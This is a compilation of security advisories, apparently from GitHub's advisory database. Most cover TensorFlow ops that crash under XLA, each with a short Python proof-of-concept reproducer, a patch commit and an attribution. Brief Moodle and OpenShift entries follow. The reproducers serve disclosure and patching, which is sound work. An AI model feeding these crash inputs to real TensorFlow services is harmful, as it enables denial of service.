Source
ghsa
### Impact The function `tf.raw_ops.LookupTableImportV2` cannot handle scalars in the `values` parameter and gives an NPE. ```python import tensorflow as tf v = tf.Variable(1) @tf.function(jit_compile=True) def test(): func = tf.raw_ops.LookupTableImportV2 para={'table_handle': v.handle,'keys': [62.98910140991211, 94.36528015136719], 'values': -919} y = func(**para) return y print(test()) ``` ### Patches We have patched the issue in GitHub commit [980b22536abcbbe1b4a5642fc940af33d8c19b69](https://github.com/tensorflow/tensorflow/commit/980b22536abcbbe1b4a5642fc940af33d8c19b69). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by r3pwnx ...
### Impact FPE in TensorListSplit with XLA ```python import tensorflow as tf func = tf.raw_ops.TensorListSplit para = {'tensor': [1], 'element_shape': -1, 'lengths': [0]} @tf.function(jit_compile=True) def fuzz_jit(): y = func(**para) return y print(fuzz_jit()) ``` ### Patches We have patched the issue in GitHub commit [728113a3be690facad6ce436660a0bc1858017fa](https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by r3pwnx
### Impact NPE in RandomShuffle with XLA enable ```python import tensorflow as tf func = tf.raw_ops.RandomShuffle para = {'value': 1e+20, 'seed': -4294967297, 'seed2': -2147483649} @tf.function(jit_compile=True) def test(): y = func(**para) return y test() ``` ### Patches We have patched the issue in GitHub commit [728113a3be690facad6ce436660a0bc1858017fa](https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by r3pwnx
### Impact When running with XLA, `tf.raw_ops.Bincount` segfaults when given a parameter `weights` that is neither the same shape as parameter `arr` nor a length-0 tensor. ```python import tensorflow as tf func = tf.raw_ops.Bincount para={'arr': 6, 'size': 804, 'weights': [52, 351]} @tf.function(jit_compile=True) def fuzz_jit(): y = func(**para) return y print(fuzz_jit()) ``` ### Patches We have patched the issue in GitHub commit [8ae76cf085f4be26295d2ecf2081e759e04b8acf](https://github.com/tensorflow/tensorflow/commit/8ae76cf085f4be26295d2ecf2081e759e04b8acf). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by r3pwnx of 360 AIVul Team
### Impact When running with XLA, `tf.raw_ops.ParallelConcat` segfaults with a nullptr dereference when given a parameter `shape` with rank that is not greater than zero. ```python import tensorflow as tf func = tf.raw_ops.ParallelConcat para = {'shape': 0, 'values': [1]} @tf.function(jit_compile=True) def test(): y = func(**para) return y test() ``` ### Patches We have patched the issue in GitHub commit [da66bc6d5ff466aee084f9e7397980a24890cd15](https://github.com/tensorflow/tensorflow/commit/da66bc6d5ff466aee084f9e7397980a24890cd15). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by r3pwnx of 360 AIVul Team
### Impact `nn_ops.fractional_avg_pool_v2` and `nn_ops.fractional_max_pool_v2` require the first and fourth elements of their parameter `pooling_ratio` to be equal to 1.0, as pooling on batch and channel dimensions is not supported. ```python import tensorflow as tf import os import numpy as np from tensorflow.python.ops import nn_ops try: arg_0_tensor = tf.random.uniform([3, 30, 50, 3], dtype=tf.float64) arg_0 = tf.identity(arg_0_tensor) arg_1_0 = 2 arg_1_1 = 3 arg_1_2 = 1 arg_1_3 = 1 arg_1 = [arg_1_0,arg_1_1,arg_1_2,arg_1_3,] arg_2 = True arg_3 = True seed = 341261001 out = nn_ops.fractional_avg_pool_v2(arg_0,arg_1,arg_2,arg_3,seed=seed,) except Exception as e: print("Error:"+str(e)) ``` ### Patches We have patched the issue in GitHub commit [ee50d1e00f81f62a4517453f721c634bbb478307](https://github.com/tensorflow/tensorflow/commit/ee50d1e00f81f62a4517453f721c634bbb478307). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on T...
### Impact Constructing a tflite model with a paramater `filter_input_channel` of less than 1 gives a FPE. ### Patches We have patched the issue in GitHub commit [34f8368c535253f5c9cb3a303297743b62442aaa](https://github.com/tensorflow/tensorflow/commit/34f8368c535253f5c9cb3a303297743b62442aaa). The fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability was reported by Wang Xuan of Qihoo 360 AIVul Team.
### Impact Out of bounds read in GRUBlockCellGrad ```python func = tf.raw_ops.GRUBlockCellGrad para = {'x': [[21.1, 156.2], [83.3, 115.4]], 'h_prev': array([[136.5], [136.6]]), 'w_ru': array([[26.7, 0.8], [47.9, 26.1], [26.2, 26.3]]), 'w_c': array([[ 0.4], [31.5], [ 0.6]]), 'b_ru': array([0.1, 0.2 ], dtype=float32), 'b_c': 0x41414141, 'r': array([[0.3], [0.4]], dtype=float32), 'u': array([[5.7], [5.8]]), 'c': array([[52.9], [53.1]]), 'd_h': array([[172.2], [188.3 ]])} ``` ### Patches We have patched the issue in GitHub commit [ff459137c2716a2a60f7d441b855fcb466d778cb](https://github.com/tensorflow/tensorflow/commit/ff459137c2716a2a60f7d441b855fcb466d778cb). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security...
In Moodle, insufficient limitations in some quiz web services made it possible for students to bypass sequential navigation during a quiz attempt.
A vulnerability was found in OpenShift Assisted Installer. During generation of the Discovery ISO, image pull secrets were leaked as plaintext in the installation logs. An authenticated user could exploit this by re-using the image pull secret to pull container images from the registry as the associated user.